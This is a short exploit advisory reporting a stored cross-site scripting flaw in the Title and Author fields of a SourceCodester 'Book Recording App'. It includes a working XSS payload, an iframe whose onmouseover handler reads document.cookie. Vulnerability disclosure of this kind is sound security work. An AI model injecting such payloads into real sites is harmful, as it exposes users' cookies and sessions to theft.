Headline
Book Recording App 2024-09-24 Cross Site Scripting
Book Recording App, as submitted on 2024-09-24, suffers from a persistent cross site scripting vulnerability.
# Exploit Title: Book Recording App - Cross Site Scripting (Stored XSS)# Date: 05/10/2024# Exploit Author: Arif Ari# Vendor Homepage: https://www.sourcecodester.com/javascript/17600/book-recording-app-using-htmlcss-vanillajs-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=17600&title=Book+Recording+App+using+HTML%26CSS+in+VanillaJS+with+Source+Code# Tested on: Windows / XAMPP# Title and Author parameters is vulnerable to stored xss. You can vulnerability this xss payload:# <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>####### Raw URL ######## http://localhost/book-recording-app-using-html-css-in-vanillajs/#